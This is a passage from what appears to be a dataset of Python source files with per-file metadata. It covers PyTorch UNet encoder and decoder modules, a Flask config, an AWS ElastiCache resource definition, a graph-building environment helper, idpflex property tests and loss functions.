self.mid_conv1 = nn.Conv2d(bottleneck, bottleneck, 3, padding=1)
self.bn1 = nn.GroupNorm(8, bottleneck)
self.mid_conv2 = nn.Conv2d(bottleneck, bottleneck, 3, padding=1)
self.bn2 = nn.GroupNorm(8, bottleneck)
self.mid_conv3 = torch.nn.Conv2d(bottleneck, bottleneck, 3, padding=1)
self.bn3 = nn.GroupNorm(8, bottleneck)
self.relu = nn.ReLU()
def forward(self, x):
x = self.down1(x)
xvals = [x]
for i in range(0, self.downsample):
x = self.down_blocks[i](x)
xvals.append(x)
x = self.relu(self.bn1(self.mid_conv1(x)))
x = self.relu(self.bn2(self.mid_conv2(x)))
x = self.relu(self.bn3(self.mid_conv3(x)))
return xvals, x
class Decoder(nn.Module):
def __init__(self, downsample, out_channels, combine_num=0):
super(Decoder, self).__init__()
self.out_channels, self.downsample = out_channels, downsample
self.combine_num = combine_num
self.up_blocks = nn.ModuleList(
[UNet_up_block(2 ** (4 + i), 2 ** (5 + i), 2 ** (4 + i)) for i in range(0, self.downsample)])
self.last_conv1 = nn.Conv2d(16, 16, 3, padding=1)
self.last_bn = nn.GroupNorm(8, 16)
self.last_conv2 = nn.Conv2d(16, self.out_channels, 1, padding=0)
self.up_sampling = nn.Upsample(scale_factor=2, mode='bilinear', align_corners=False)
self.relu = nn.ReLU()
def forward(self, xvals, x):
devals = []
for i in range(0, self.downsample)[::-1]:
x = self.up_blocks[i](xvals[i], x)
if i < self.combine_num:
devals.append(x)
y = self.last_bn(self.last_conv1(x))
y = self.last_conv2(x)
if len(devals) > 0:
for j, decode in enumerate(devals):
for _ in range(len(devals) - 1 - j):
decode = self.up_sampling(decode)
devals[j] = decode
combine_x = torch.cat(devals[::-1], dim=1)
return y, combine_x
else:
return y, x
class Encoder_sim(nn.Module):
def __init__(self, downsample=4, in_channels=3):
super(Encoder_sim, self).__init__()
self.downsample = downsample
self.conv = ConvBlock(in_channels, 64)
self.down_blocks = nn.ModuleList(
[UNet_down_block(2 ** (6 + i), 2 ** (7 + i), True) for i in range(0, downsample)]
)
bottleneck = 2 ** (6 + self.downsample)
self.mid_conv1 = nn.Conv2d(bottleneck, bottleneck, 3, padding=1)
self.bn1 = nn.GroupNorm(8, bottleneck)
self.mid_conv2 = nn.Conv2d(bottleneck, bottleneck, 3, padding=1)
self.bn2 = nn.GroupNorm(8, bottleneck)
self.mid_conv3 = torch.nn.Conv2d(bottleneck, bottleneck, 3, padding=1)
self.bn3 = nn.GroupNorm(8, bottleneck)
self.relu = nn.ReLU()
def forward(self, x):
x = self.conv(x)
xvals = [x]
for i in range(0, self.downsample):
x = self.down_blocks[i](x)
xvals.append(x)
x = self.relu(self.bn1(self.mid_conv1(x)))
x = self.relu(self.bn2(self.mid_conv2(x)))
x = self.relu(self.bn3(self.mid_conv3(x)))
return xvals, x
class Decoder_sim(nn.Module):
def __init__(self, downsample, out_channels):
super(Decoder_sim, self).__init__()
self.downsample, self.out_channels = downsample, out_channels
self.up_blocks = nn.ModuleList(
[UNet_up_block(2 ** (6 + i), 2 ** (7 + i), 2 ** (6 + i)) for i in range(0, self.downsample)]
)
self.last_conv1 = nn.Conv2d(64, 64, 3, padding=1)
self.last_bn = nn.GroupNorm(8, 64)
self.last_conv2 = nn.Conv2d(64, self.out_channels, 1, padding=0)
self.relu = nn.ReLU()
def forward(self, xvals, x):
for i in range(0, self.downsample)[::-1]:
x = self.up_blocks[i](xvals[i], x)
y = self.last_bn(self.last_conv1(x))
y = self.last_conv2(y)
return y, x
class ThreeD2NorDepth(nn.Module):
def __init__(self, downsample=3, use_simple=True):
super(ThreeD2NorDepth, self).__init__()
if use_simple:
self.threeD_encoder = Encoder_sim(downsample=downsample, in_channels=3)
self.normal_decoder = Decoder_sim(downsample=downsample, out_channels=3)
self.depth_decoder = Decoder_sim(downsample=downsample, out_channels=1)
else:
self.threeD_encoder = Encoder(downsample=downsample, in_channels=3)
self.normal_decoder = Decoder(downsample=downsample, out_channels=3, combine_num=0)
self.depth_decoder = Decoder(downsample=downsample, out_channels=1, combine_num=0)
def forward(self, x):
xvals, x = self.threeD_encoder(x)
nor, _ = self.normal_decoder(xvals, x)
dep, _ = self.depth_decoder(xvals, x)
return nor, dep
class AlbedoDecoder_sim(nn.Module):
def __init__(self, downsample=6, out_channels=1):
super(AlbedoDecoder_sim, self).__init__()
self.out_channels, self.downsample = out_channels, downsample
self.up_blocks = nn.ModuleList(
[UNet_up_block(2 ** (7 + i), 2 ** (8 + i), 2 ** (7 + i)) for i in range(0, self.downsample)])
self.last_conv1 = nn.Conv2d(128, 64, 3, padding=1)
self.last_bn = nn.GroupNorm(8, 64)
self.last_conv2 = nn.Conv2d(64, self.out_channels, 1, padding=0)
self.relu = nn.ReLU()
def forward(self, xvals, x):
for i in range(0, self.downsample)[::-1]:
x = self.up_blocks[i](xvals[i], x)
y = self.last_bn(self.last_conv1(x))
y = self.last_conv2(y)
return y, x
class AlbedoDecoder(nn.Module):
def __init__(self, downsample=6, out_channels=1):
super(AlbedoDecoder, self).__init__()
self.out_channels, self.downsample = out_channels, downsample
self.up_blocks = nn.ModuleList(
[UNet_up_block(2 ** (5 + i), 2 ** (6 + i), 2 ** (5 + i)) for i in range(0, self.downsample)])
self.last_conv1 = nn.Conv2d(32, 32, 3, padding=1)
self.last_bn = nn.GroupNorm(8, 32)
self.last_conv2 = nn.Conv2d(32, self.out_channels, 1, padding=0)
self.relu = nn.ReLU()
def forward(self, xvals, x):
for i in range(0, self.downsample)[::-1]:
x = self.up_blocks[i](xvals[i], x)
y = self.last_bn(self.last_conv1(x))
y = self.last_conv2(y)
return y, x
class ConvBlock(nn.Module):
def __init__(self, f1, f2, kernel_size=3, padding=1, use_groupnorm=False, groups=8, dilation=1, transpose=False):
super(ConvBlock, self).__init__()
self.transpose = transpose
self.conv = nn.Conv2d(f1, f2, (kernel_size, kernel_size), dilation=dilation, padding=padding*dilation)
if self.transpose:
self.convt = nn.ConvTranspose2d(
f1, f1, (3, 3), dilation=dilation, stride=2, padding=dilation, output_padding=1
)
if use_groupnorm:
self.bn = nn.GroupNorm(groups, f1)
else:
self.bn = nn.BatchNorm2d(f1)
def forward(self, x):
# x = F.dropout(x, 0.04, self.training)
x = self.bn(x)
if self.transpose:
# x = F.upsample(x, scale_factor=2, mode='bilinear')
x = F.relu(self.convt(x))
# x = x[:, :, :-1, :-1]
x = F.relu(self.conv(x))
return x
| 41.133949
| 117
| 0.60311
| 15,375
| 0.863231
| 0
| 0
| 0
| 0
| 0
| 0
| 2,574
| 0.144517
|
0b6eaa68175183e78cc2a72bb734ce612395335a
| 341
|
py
|
Python
|
flask_webpack_bundle/config.py
|
briancappello/flask-webpack-bundle
|
67896e6ade345e34721a8f9da156b65fc0646984
|
[
"MIT"
] | null | null | null |
flask_webpack_bundle/config.py
|
briancappello/flask-webpack-bundle
|
67896e6ade345e34721a8f9da156b65fc0646984
|
[
"MIT"
] | null | null | null |
flask_webpack_bundle/config.py
|
briancappello/flask-webpack-bundle
|
67896e6ade345e34721a8f9da156b65fc0646984
|
[
"MIT"
] | null | null | null |
import os
from flask_unchained import AppConfig
class Config(AppConfig):
WEBPACK_MANIFEST_PATH = os.path.join(
AppConfig.STATIC_FOLDER, 'assets', 'manifest.json')
class ProdConfig:
# use relative paths by default, ie, the same host as the backend
WEBPACK_ASSETS_HOST = ''
class StagingConfig(ProdConfig):
pass
| 18.944444
| 69
| 0.730205
| 283
| 0.829912
| 0
| 0
| 0
| 0
| 0
| 0
| 90
| 0.26393
|
0b6fda84960a8cf5a23f750128dc700eaee71d2f
| 2,458
|
py
|
Python
|
touchdown/aws/elasticache/replication_group.py
|
yaybu/touchdown
|
70ecda5191ce2d095bc074dcb23bfa1584464814
|
[
"Apache-2.0"
] | 14
|
2015-01-05T18:18:04.000Z
|
2022-02-07T19:35:12.000Z
|
touchdown/aws/elasticache/replication_group.py
|
yaybu/touchdown
|
70ecda5191ce2d095bc074dcb23bfa1584464814
|
[
"Apache-2.0"
] | 106
|
2015-01-06T00:17:13.000Z
|
2019-09-07T00:35:32.000Z
|
touchdown/aws/elasticache/replication_group.py
|
yaybu/touchdown
|
70ecda5191ce2d095bc074dcb23bfa1584464814
|
[
"Apache-2.0"
] | 5
|
2015-01-30T10:18:24.000Z
|
2022-02-07T19:35:13.000Z
|
# Copyright 2014 Isotoma Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from touchdown.core import argument, output, serializers
from touchdown.core.plan import Plan
from ..common import SimpleApply, SimpleDescribe, SimpleDestroy
from .cache import BaseCacheCluster
class ReplicationGroup(BaseCacheCluster):
resource_name = "replication_group"
name = argument.String(
max=16, regex=r"[a-z1-9\-]{1,20}", field="ReplicationGroupId"
)
description = argument.String(
default=lambda resource: resource.name, field="ReplicationGroupDescription"
)
primary_cluster = argument.Resource(
"touchdown.aws.elasticache.cache.CacheCluster", field="PrimaryClusterId"
)
automatic_failover = argument.Boolean(field="AutomaticFailoverEnabled")
num_cache_clusters = argument.Integer(field="NumCacheClusters", update=False)
endpoint_address = output.Output(
serializers.Property("NodeGroups[0].PrimaryEndpoint.Address")
)
endpoint_port = output.Output(
serializers.Property("NodeGroups[0].PrimaryEndpoint.Port")
)
class Describe(SimpleDescribe, Plan):
resource = ReplicationGroup
service_name = "elasticache"
api_version = "2015-02-02"
describe_action = "describe_replication_groups"
describe_envelope = "ReplicationGroups"
describe_notfound_exception = "ReplicationGroupNotFoundFault"
key = "ReplicationGroupId"
class Apply(SimpleApply, Describe):
create_action = "create_replication_group"
update_action = "modify_replication_group"
waiter = "replication_group_available"
class Destroy(SimpleDestroy, Describe):
destroy_action = "delete_replication_group"
waiter = "replication_group_deleted"
def get_destroy_serializer(self):
return serializers.Dict(
ReplicationGroupId=serializers.Identifier(),
RetainPrimaryCluster=True if self.resource.primary_cluster else False,
)
| 32.773333
| 83
| 0.746542
| 1,673
| 0.680635
| 0
| 0
| 0
| 0
| 0
| 0
| 1,092
| 0.444264
|
0b6ffbf766a563164a019a52f34be9e1263ae173
| 4,197
|
py
|
Python
|
core/env.py
|
ayyuriss/EigenFunctions
|
8cb6c22871fcddb633392c0a12691e960dad5143
|
[
"MIT"
] | null | null | null |
core/env.py
|
ayyuriss/EigenFunctions
|
8cb6c22871fcddb633392c0a12691e960dad5143
|
[
"MIT"
] | null | null | null |
core/env.py
|
ayyuriss/EigenFunctions
|
8cb6c22871fcddb633392c0a12691e960dad5143
|
[
"MIT"
] | null | null | null |
import xxhash
import numpy as np
from base.grid import SimpleGRID
import scipy.sparse as SP
h = xxhash.xxh64()
s_to_i = lambda x,size : size*x[0]+x[1]
i_to_s = lambda x,size : (x%size,x//size)
def hash(x):
h.reset()
h.update(x)
return h.digest()
class Indexer(object):
def __init__(self):
self.total = 0
self.dict = {}
def get(self,hs):
val = self.dict.get(hs,-1)
if val == -1:
val = self.total
self.dict[hs] = val
self.total += 1
return val
def reset(self):
self.__init__()
class HashIndexer(object):
def __init__(self):
self.total = 0
self.dict = {}
def get(self,state):
hs=hash(state)
val = self.dict.get(hs,-1)
if val == -1:
val = self.total
self.dict[hs] = val
self.total += 1
return val
def reset(self):
self.__init__()
def get_graph(size):
env = SimpleGRID(grid_size=size,max_time=5000)
input_shape = env.observation_space.shape
min_batch = size**2-size
indexer = Indexer()
W = np.zeros((min_batch,min_batch))
states = np.zeros(min_batch).astype(int)
data = np.zeros((min_batch,)+input_shape)
while indexer.total<min_batch:
done = False
s = env.reset()
#s = s.transpose(2,0,1)#np.expand_dims(s,axis=0)
i = indexer.get(s_to_i(env.get_cat(),size))
states[i] = s_to_i(env.get_cat(),size)
data[states[i]] = s
while not done:
s,r,done = env.step(np.random.randint(4))
#s = np.expand_dims(s,axis=0)
#s = s.transpose(-1,0,1)
j = indexer.get(s_to_i(env.get_cat(),size))
states[j] = s_to_i(env.get_cat(),size)
data[states[j]] = s
W[states[i],states[j]] = W[states[j],states[i]] = 1
if r==1:
print(s_to_i(env.get_cat(),size),indexer.total)
i = j
return data, W
class GraphBuilder(object):
def __init__(self, env, action_set, batch_size):
self.env = env
self.action_set = action_set
self.h = xxhash.xxh64()
self.max_size = batch_size
self.indices = set()
self._total = 0
self.dict = {}
self.states = []
self.prev = 0
self.roll = self.roller()
def submit(self,state, new=False):
hs = self.hash(state)
val = self.dict.get(hs,-1)
if val == -1:
self.states.append(state)
val = self._total
self.dict[hs] = self._total
self._total += 1
if not new:
self.indices.add((self.prev,val))
self.prev = val
def reset(self):
self.indices = set()
self._total = 0
self.dict = {}
self.states = []
self.prev = 0
def roller(self):
done = True
while True:
self.reset()
while not self.full:
if done:
s = self.env.reset()
self.submit(s.copy(), new=done)
done = False
while not done and not self.full:
s,_,done,_ = self.env.step(np.random.choice(self.action_set))
self.submit(s.copy())
S,W = self.get_graph()
W = W.toarray()
#W = (W+W.T)/2
W = np.maximum(W,W.T)
#np.fill_diagonal(W, 1)
yield S, W
def get(self):
return self.roll.__next__()
def hash(self,x):
self.h.reset()
self.h.update(x)
return self.h.digest()
def get_graph(self):
if not self.full:
raise "Graph not full Yet"
indices = np.array(list(self.indices))
rows = indices[:,0]
cols = indices[:,1]
data = np.ones(len(rows))
return np.array(self.states),SP.coo_matrix((data, (rows, cols)),shape=(self.max_size, self.max_size))
@property
def size(self):
return self._total
@property
def full(self):
return self.size == self.max_size
| 26.732484
| 109
| 0.510841
| 2,850
| 0.679056
| 624
| 0.148678
| 127
| 0.03026
| 0
| 0
| 158
| 0.037646
|
0b710ba6108771869cc4dcfa0e46001cedd35936
| 14,324
|
py
|
Python
|
tests/test_properties.py
|
jmborr/ipdflex
|
9537247c78373f740873703448d948e7a7ada9fb
|
[
"MIT"
] | 3
|
2020-01-15T08:23:48.000Z
|
2022-03-28T22:14:05.000Z
|
tests/test_properties.py
|
jmborr/idpflex
|
9537247c78373f740873703448d948e7a7ada9fb
|
[
"MIT"
] | 46
|
2018-01-10T22:51:46.000Z
|
2021-11-15T17:47:32.000Z
|
tests/test_properties.py
|
jmborr/ipdflex
|
9537247c78373f740873703448d948e7a7ada9fb
|
[
"MIT"
] | 5
|
2018-01-27T15:27:45.000Z
|
2020-01-15T08:23:50.000Z
|
import random
import numpy as np
import pytest
import tempfile
import shutil
from idpflex import properties as ps
from idpflex.properties import SecondaryStructureProperty as SSP
class TestRegisterDecorateProperties(object):
def test_register_as_node_property(self):
class SomeProperty(object):
def __init__(self):
attrs = dict(id='foo', a='ax', b='by', c='ce')
self.__dict__.update(attrs)
associations = (('id', 'name of the property'),
('a', 'this is x'),
('b', 'this is y'),
('c', 'this is e'))
ps.register_as_node_property(SomeProperty, associations)
# Test for class attributes
assert isinstance(ps.ProfileProperty.name, property)
assert isinstance(ps.ProfileProperty.x, property)
assert isinstance(ps.ProfileProperty.y, property)
assert isinstance(ps.ProfileProperty.e, property)
# Test for managed attributes
some_prop = SomeProperty()
assert some_prop.name == 'foo'
assert some_prop.x == 'ax'
assert some_prop.y == 'by'
assert some_prop.e == 'ce'
def test_decorate_as_node_property(self):
associations = (('id', 'name of the property'),
('a', 'this is x'),
('b', 'this is y'),
('c', 'this is e'))
@ps.decorate_as_node_property(associations)
class SomeProperty(object):
def __init__(self):
attrs = dict(id='foo', a='ax', b='by', c='ce')
self.__dict__.update(attrs)
# Test for class attributes
assert isinstance(ps.ProfileProperty.name, property)
assert isinstance(ps.ProfileProperty.x, property)
assert isinstance(ps.ProfileProperty.y, property)
assert isinstance(ps.ProfileProperty.e, property)
# Test for managed attributes
some_prop = SomeProperty()
assert some_prop.name == 'foo'
assert some_prop.x == 'ax'
assert some_prop.y == 'by'
assert some_prop.e == 'ce'
class TestScalarProperty(object):
def test_histogram(self, benchmark):
root_prop = benchmark['tree'].root['sc']
edges, h, e = root_prop.histogram(bins=1, errors=True)
assert h[0] == benchmark['nleafs']
assert e[0] == np.sqrt(h[0])
def test_plot_histogram(self, benchmark):
root_prop = benchmark['tree'].root['sc']
ax = root_prop.plot(kind='histogram', errors=True, bins=1)
assert ax.patches[0]._height == benchmark['nleafs']
class TestAsphericity(object):
def test_from_pdb(self, ss_benchmark):
filename = ss_benchmark['pdb_file']
prop = ps.Asphericity().from_pdb(filename)
np.testing.assert_almost_equal(prop.asphericity, 0.71, decimal=2)
class TestEndToEnd(object):
def test_from_pdb(self, ss_benchmark):
filename = ss_benchmark['pdb_file']
prop = ps.EndToEnd().from_pdb(filename)
np.testing.assert_almost_equal(prop.end_to_end, 9.244, decimal=3)
class TestSaSa(object):
def test_from_pdb(self, ss_benchmark):
filename = ss_benchmark['pdb_file']
prop = ps.SaSa().from_pdb(filename)
np.testing.assert_allclose(prop.sasa, 2964, rtol=0.10)
prop = ps.SaSa().from_pdb(filename, n_sphere_points=3)
np.testing.assert_allclose(prop.sasa, 2989, rtol=0.10)
prop = ps.SaSa().from_pdb(filename, selection='resid 0 to 10')
np.testing.assert_allclose(prop.sasa, 1350, rtol=0.16)
class TestRadiusOfGyration(object):
def test_from_pdb(self, ss_benchmark):
filename = ss_benchmark['pdb_file']
prop = ps.RadiusOfGyration().from_pdb(filename, 'name CA')
np.testing.assert_almost_equal(prop.rg, 8.75, decimal=2)
class TestResidueContactMap(object):
def test_from_universe(self, trajectory_benchmark):
cm = ps.ResidueContactMap().from_universe(trajectory_benchmark,
8, 'name CA')
assert np.sum(cm.y) == 363
cm = ps.ResidueContactMap().from_universe(trajectory_benchmark, 4)
assert np.sum(cm.y) == 313
def test_from_pdb(self, ss_benchmark):
filename = ss_benchmark['pdb_file']
cm = ps.ResidueContactMap().from_pdb(filename, 8, 'name CA')
assert np.sum(cm.y) == 351
@pytest.mark.skip(reason="Plotting not enabled in the CI")
def test_plot(self, trajectory_benchmark):
cm = ps.ResidueContactMap().from_universe(trajectory_benchmark,
8, 'name CA')
cm.plot()
class TestSecondaryStructureProperty(object):
def test_class_decorated_as_node_property(self):
assert isinstance(SSP.name, property)
assert isinstance(SSP.x, property)
assert isinstance(SSP.y, property)
assert isinstance(SSP.e, property)
def test_instance_decorated_as_node_property(self):
ss = 'GTEL'
v = np.random.rand(len(ss), SSP.n_codes)
v /= np.sum(v, axis=1)[:, np.newaxis] # normalize rows
profile_prop = SSP(name='foo', aa=ss, profile=v, errors=0.1*v)
assert profile_prop.name == 'foo'
assert np.array_equal(profile_prop.x, ss)
assert np.array_equal(profile_prop.y, v)
assert np.array_equal(profile_prop.e, 0.1*v)
def test_default_name(self):
ss_prop = SSP()
assert ss_prop.name == 'ss'
def test_from_dssp_sequence(self):
seq = ''.join(random.sample(SSP.dssp_codes, SSP.n_codes))
ss_prop = SSP().from_dssp_sequence(seq)
np.testing.assert_array_equal(ss_prop.y[-1], SSP.code2profile(seq[-1]))
def test_from_dssp(self, ss_benchmark):
name = ss_benchmark['dssp_file']
ss_prop = SSP().from_dssp(name)
np.testing.assert_array_equal(ss_prop.y[-1], SSP.code2profile(' '))
@pytest.mark.skip(reason="DSSP may not be installed in the machine")
def test_from_dssp_pdb(self, ss_benchmark):
name = ss_benchmark['pdb_file']
ss_prop = SSP().from_dssp_pdb(name)
np.testing.assert_array_equal(ss_prop.y[-1], SSP.code2profile(' '))
def test_propagator_size_weighted_sum(self, small_tree):
r"""Create random secondary sequences by shufling all codes and
assign to the leafs of the tree. Then, propagate the profiles up
the tree hiearchy. Finally, compare the profile of the root with
expected profile.
"""
tree = small_tree['tree']
ss_props = list()
for i in range(tree.nleafs):
seq = ''.join(random.sample(SSP.dssp_codes, SSP.n_codes))
ss_props.append(SSP().from_dssp_sequence(seq))
ps.propagator_size_weighted_sum(ss_props, tree)
# Manually calculate the average profile for the last residue
y = np.asarray([ss_props[i].y for i in range(tree.nleafs)])
average_profile = np.mean(y, axis=0)
np.testing.assert_array_almost_equal(average_profile,
tree.root['ss'].y, decimal=12)
def test_fractions(self):
profile = np.random.rand(42, SSP.n_codes) # not normalized
prop = SSP(profile=profile)
f = prop.fractions
assert f['H'] == np.sum(profile, axis=0)[0] / 42
def test_collapse(self):
profile = np.random.rand(42, SSP.n_codes) # not normalized
prop = SSP(profile=profile)
c = prop.collapsed
assert c[0] == np.argmax(profile[0])
def test_disparity(self):
p = np.random.rand(42, SSP.n_codes) # not normalized
o = np.zeros((42, SSP.n_codes))
pr = SSP(profile=p)
assert pr.disparity(SSP(profile=-p)) == 4 * \
pr.disparity(SSP(profile=o))
@pytest.mark.skip(reason="Plotting not enabled in the CI")
def test_plot_percents(self):
profile = np.random.rand(42, SSP.n_codes) # not normalized
profile /= np.sum(profile, axis=1)[:, np.newaxis] # normalized
prop = SSP(profile=profile)
prop.plot('percents')
@pytest.mark.skip(reason="Plotting not enabled in the CI")
def test_plot_node(self):
profile = np.random.rand(42, SSP.n_codes) # not normalized
profile /= np.sum(profile, axis=1)[:, np.newaxis] # normalized
prop = SSP(profile=profile)
prop.plot('node')
@pytest.mark.skip(reason="Plotting not enabled in the CI")
def test_plot_leafs(self, small_tree):
tree = small_tree['tree']
ss_props = list()
for i in range(tree.nleafs):
seq = ''.join(random.sample(1000*SSP.dssp_codes, 42))
ss_props.append(SSP().from_dssp_sequence(seq))
ps.propagator_size_weighted_sum(ss_props, tree)
tree.root['ss'].plot('leafs')
class TestProfileProperty(object):
def test_class_decorated_as_node_property(self):
assert isinstance(ps.ProfileProperty.name, property)
assert isinstance(ps.ProfileProperty.x, property)
assert isinstance(ps.ProfileProperty.y, property)
assert isinstance(ps.ProfileProperty.e, property)
def test_instance_decorated_as_node_property(self):
v = np.arange(9)
profile_prop = ps.ProfileProperty(name='foo', qvalues=v, profile=10*v,
errors=0.1*v)
assert profile_prop.name == 'foo'
assert np.array_equal(profile_prop.x, v)
assert np.array_equal(profile_prop.y, 10*v)
assert np.array_equal(profile_prop.e, 0.1*v)
class TestSansProperty(object):
def test_registered_as_node_property(self):
assert isinstance(ps.SansProperty.name, property)
assert isinstance(ps.SansProperty.x, property)
assert isinstance(ps.SansProperty.y, property)
assert isinstance(ps.SansProperty.e, property)
def test_default_name(self):
sans_prop = ps.SansProperty()
assert sans_prop.name == 'sans'
def test_from_sassena(self, sans_benchmark):
sans_prop = ps.SansProperty()
sans_prop.from_sassena(sans_benchmark['profiles'], index=666)
assert sans_prop.qvalues[13].item() - 0.0656565651298 < 0.000000001
assert sans_prop.profile[13].item() - 741970.84461578 < 0.000001
def test_from_cryson_int(self, sans_benchmark):
sans_prop = ps.SansProperty()
sans_prop.from_cryson_int(sans_benchmark['cryson_int'])
assert sans_prop.qvalues[8] == 0.08
assert sans_prop.profile[8] == 0.229457E+06
assert sans_prop.errors[8] == 0.0
@pytest.mark.skipif(shutil.which('cryson') is None, reason='Needs cryson')
def test_from_cryson_pdb(self, sans_benchmark):
sans_prop = ps.SansProperty()
sans_prop.from_cryson_pdb(sans_benchmark['cryson_pdb'], args='')
sans_prop_ref = ps.SansProperty()
sans_prop_ref.from_cryson_int(sans_benchmark['cryson_int'])
np.testing.assert_array_almost_equal(
sans_prop.qvalues, sans_prop_ref.qvalues)
np.testing.assert_array_almost_equal(
sans_prop.profile, sans_prop_ref.profile)
def test_to_and_from_ascii(self, sans_benchmark):
sans_prop_ref = ps.SansProperty()
sans_prop_ref.from_cryson_int(sans_benchmark['cryson_int'])
sans_prop = ps.SansProperty()
with tempfile.NamedTemporaryFile() as f:
sans_prop_ref.to_ascii(f.name)
sans_prop.from_ascii(f.name)
np.testing.assert_array_almost_equal(
sans_prop.qvalues, sans_prop_ref.qvalues)
class TestSaxsProperty(object):
def test_registered_as_node_property(self):
assert isinstance(ps.SaxsProperty.name, property)
assert isinstance(ps.SaxsProperty.x, property)
assert isinstance(ps.SaxsProperty.y, property)
assert isinstance(ps.SaxsProperty.e, property)
def test_default_name(self):
saxs_prop = ps.SaxsProperty()
assert saxs_prop.name == 'saxs'
def test_from_crysol_int(self, saxs_benchmark):
saxs_prop = ps.SaxsProperty()
saxs_prop.from_crysol_int(saxs_benchmark['crysol_file'])
assert saxs_prop.qvalues[8] == 0.008
assert saxs_prop.profile[8] == 1740900.0
assert saxs_prop.errors[8] == 0.0
@pytest.mark.skipif(shutil.which('crysol') is None, reason='Needs crysol')
def test_from_crysol_pdb(self, saxs_benchmark):
saxs_prop = ps.SaxsProperty()
saxs_prop.from_crysol_pdb(saxs_benchmark['crysol_pdb'], args='')
saxs_prop_ref = ps.SaxsProperty()
saxs_prop_ref.from_crysol_int(saxs_benchmark['crysol_int'])
np.testing.assert_array_almost_equal(
saxs_prop.qvalues, saxs_prop_ref.qvalues)
np.testing.assert_array_almost_equal(
saxs_prop.profile, saxs_prop_ref.profile)
def test_to_and_from_ascii(self, saxs_benchmark):
saxs_prop_ref = ps.SaxsProperty()
saxs_prop_ref.from_crysol_int(saxs_benchmark['crysol_int'])
saxs_prop = ps.SaxsProperty()
with tempfile.NamedTemporaryFile() as f:
saxs_prop_ref.to_ascii(f.name)
saxs_prop.from_ascii(f.name)
np.testing.assert_array_almost_equal(
saxs_prop.qvalues, saxs_prop_ref.qvalues)
class TestPropagators(object):
def test_propagator_weighted_sum(self, benchmark):
tree = benchmark['tree']
ps.propagator_weighted_sum(benchmark['simple_property'], tree)
lfs = benchmark['nleafs']
assert tree.root['foo'].bar == int(lfs * (lfs-1) / 2)
def test_propagator_size_weighted_sum(self, sans_benchmark):
tree = sans_benchmark['tree_with_no_property']
values = sans_benchmark['property_list']
ps.propagator_size_weighted_sum(values, tree)
# Test the propagation of the profiles for a node randomly picked
node_id = np.random.randint(tree.nleafs, len(tree)) # exclude leafs
node = tree[node_id]
ln = node.left
rn = node.right
w = float(ln.count) / (ln.count + rn.count)
lnp = ln['sans'] # profile of the "left" sibling node
rnp = rn['sans']
y = w * lnp.y + (1 - w) * rnp.y
assert np.array_equal(y, node['sans'].y)
if __name__ == '__main__':
pytest.main()
| 39.569061
| 79
| 0.645909
| 14,061
| 0.981639
| 0
| 0
| 2,852
| 0.199106
| 0
| 0
| 1,556
| 0.108629
|
0b71623dce279f8394f45396a0c88a69e51e39e7
| 272
|
py
|
Python
|
3d_cnn/src/constants/particles.py
|
mrmattuschka/DeePiCt
|
ef3e81ea25705076f340175d97ccff98f8d11799
|
[
"Apache-2.0"
] | null | null | null |
3d_cnn/src/constants/particles.py
|
mrmattuschka/DeePiCt
|
ef3e81ea25705076f340175d97ccff98f8d11799
|
[
"Apache-2.0"
] | 2
|
2022-03-08T09:22:23.000Z
|
2022-03-20T21:13:07.000Z
|
3d_cnn/src/constants/particles.py
|
ZauggGroup/DeePiCt
|
0bdf1cd845cc306e66e30face1010c12ca3a38d0
|
[
"Apache-2.0"
] | null | null | null |
from os.path import join
def create_particle_file_name(folder_path: str, img_number: int,
coord_indx: int, ext: str) -> str:
file_name = str(img_number) + 'particle' + str(coord_indx) + '.' + ext
return join(folder_path, file_name)
| 34
| 74
| 0.636029
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 13
| 0.047794
|
0b72374ff1f0c05184c363dcfc881dd0ee234e7e
| 13,807
|
py
|
Python
|
unn/models/heads/utils/loss.py
|
zongdaoming/TinyTransformer
|
8e64f8816117048c388b4b20e3a56760ce149fe3
|
[
"Apache-2.0"
] | 2
|
2021-08-08T11:23:14.000Z
|
2021-09-16T04:05:23.000Z
|
unn/models/heads/utils/loss.py
|
zongdaoming/TinyTransformer
|
8e64f8816117048c388b4b20e3a56760ce149fe3
|
[
"Apache-2.0"
] | 1
|
2021-08-08T11:25:47.000Z
|
2021-08-08T11:26:15.000Z
|
unn/models/heads/utils/loss.py
|
zongdaoming/TinyTransformer
|
8e64f8816117048c388b4b20e3a56760ce149fe3
|
[
"Apache-2.0"
] | null | null | null |
import logging
import torch
import torch.nn as nn
import torch.nn.functional as F
from .... import extensions as E
from . import accuracy as A
logger = logging.getLogger('global')
def _reduce(loss, reduction, **kwargs):
if reduction == 'none':
ret = loss
elif reduction == 'mean':
normalizer = loss.numel()
if kwargs.get('normalizer', None):
normalizer = kwargs['normalizer']
ret = loss.sum() / normalizer
elif reduction == 'sum':
ret = loss.sum()
else:
raise ValueError(reduction + ' is not valid')
return ret
def l1_loss(input, target, scale_type='linear', reduction='mean', normalizer=None):
if scale_type == 'linear':
input = input
target = target
elif scale_type == 'log':
input = torch.log(input)
target = torch.log(target)
else:
raise NotImplementedError
loss = torch.abs(input - target)
loss = _reduce(loss, reduction=reduction, normalizer=normalizer)
return loss
def balanced_l1_loss(input, target, sigma=1.0, alpha=0.5, gamma=1.5, reduction='mean', normalizer=None):
beta = 1. / (sigma**2)
diff = torch.abs(input - target)
b = np.e**(gamma / alpha) - 1
loss = torch.where(
diff < beta, alpha / b * (b * diff + 1)
* torch.log(b * diff / beta + 1) - alpha * diff,
gamma * diff + gamma / b - alpha * beta)
loss = _reduce(loss, reduction, normalizer=normalizer)
return loss
def smooth_l1_loss(input, target, sigma, reduce=True, normalizer=1.0):
beta = 1. / (sigma**2)
diff = torch.abs(input - target)
cond = diff < beta
loss = torch.where(cond, 0.5 * diff**2 / beta, diff - 0.5 * beta)
if reduce:
return torch.sum(loss) / normalizer
return torch.sum(loss, dim=1) / normalizer
def cross_entropy_weight(input, target, sample_weight=None, cls_weight=None):
if sample_weight is None:
return F.cross_entropy(input, target, weight=cls_weight)
sample_num = target.size()[0]
log_input = F.log_softmax(input, 1)
loss = F.nll_loss(log_input * sample_weight.reshape(sample_num, 1),
target, cls_weight)
return loss * sample_num / sample_weight.sum() # normal
